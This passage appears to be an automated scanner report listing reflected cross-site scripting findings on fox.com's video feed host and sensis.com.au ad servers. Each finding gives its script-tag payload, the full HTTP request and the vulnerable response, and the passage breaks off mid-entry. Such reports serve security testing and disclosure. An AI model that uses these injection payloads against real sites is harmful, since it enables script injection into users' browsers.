GET /s/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clipsdb47d<script>alert(1)</script>0e109b9d114&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:19:13 GMT
Access-Control-Allow-Origin: *
Content-Type: application/smil; charset=UTF-8
X-Cache: HIT from link.theplatform.com:80
Cache-Control: max-age=5
Connection: close
Server: Jetty(6.1.19)

<smil xmlns="http://www.w3.org/2005/SMIL21/Language">
<head>
</head>
<body>
<seq>
<switch>
   <video src="http://fbchdvod-f.akamaihd.net/z/Fox.com/2/289/GLEE_303_First_Look_Asian_F_2500.mp4?hdnea=ip=50.
...[SNIP]...
<param name="trackingData" value="b=333085|cc=US|ci=1|cid=1343887|d=1317759553892|l=144597|p=Homepage Player - Network HP Featured Clipsdb47d<script>alert(1)</script>0e109b9d114|rc=TX|rid=1344184"/>
...[SNIP]...

1.37. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/JV5bOqASsrxR

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 8fa14<script>alert(1)</script>933a798a5b1 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL8fa14<script>alert(1)</script>933a798a5b1&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Date: Tue, 04 Oct 2011 20:19:14 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Connection: close
Server: Jetty(6.1.19)

{
   "title": "Unsupported Metafile Format",
   "description": "'SMIL8fa14<script>alert(1)</script>933a798a5b1' is not a supported metafile format.",
   "isException": true,
   "exception": "UnsupportedFormat",
   "responseCode": "400"
}

1.38. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb6f"><script>alert(1)</script>5e9e856ebbd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver2eb6f"><script>alert(1)</script>5e9e856ebbd/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:24 GMT
X-DirectServer: DS6
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d38000000002eb6f"><script>alert(1)</script>5e9e856ebbd/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.39. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44942"><script>alert(1)</script>1a35826ae0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random44942"><script>alert(1)</script>1a35826ae0=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:27 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 414
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random44942"><script>alert(1)</script>1a35826ae0=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.40. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de975"><script>alert(1)</script>05535384c68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939?de975"><script>alert(1)</script>05535384c68=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:19 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 418
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939?de975"><script>alert(1)</script>05535384c68=1&relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.41. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9aaa"><script>alert(1)</script>8613fae918b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverf9aaa"><script>alert(1)</script>8613fae918b/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:42 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000f9aaa"><script>alert(1)</script>8613fae918b/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.42. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539a8"><script>alert(1)</script>743c7d9af22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random539a8"><script>alert(1)</script>743c7d9af22=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:45 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random539a8"><script>alert(1)</script>743c7d9af22=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.43. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f256"><script>alert(1)</script>4a926be100 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947?4f256"><script>alert(1)</script>4a926be100=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:37 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 417
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947?4f256"><script>alert(1)</script>4a926be100=1&relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.44. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6904"><script>alert(1)</script>e367996f762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverf6904"><script>alert(1)</script>e367996f762/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:43 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000f6904"><script>alert(1)</script>e367996f762/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.45. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d607d"><script>alert(1)</script>5d682b42722 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomd607d"><script>alert(1)</script>5d682b42722=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:45 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_randomd607d"><script>alert(1)</script>5d682b42722=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.46. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a982e"><script>alert(1)</script>7c444ae9300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?a982e"><script>alert(1)</script>7c444ae9300=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:37 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 322
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?a982e"><script>alert(1)</script>7c444ae9300=1" target="_new">
...[SNIP]...

1.47. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99cbb"><script>alert(1)</script>747a230ed95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver99cbb"><script>alert(1)</script>747a230ed95/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:11 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d380000000099cbb"><script>alert(1)</script>747a230ed95/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.48. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93677"><script>alert(1)</script>44e502d5c1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random93677"><script>alert(1)</script>44e502d5c1b=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random93677"><script>alert(1)</script>44e502d5c1b=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.49. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

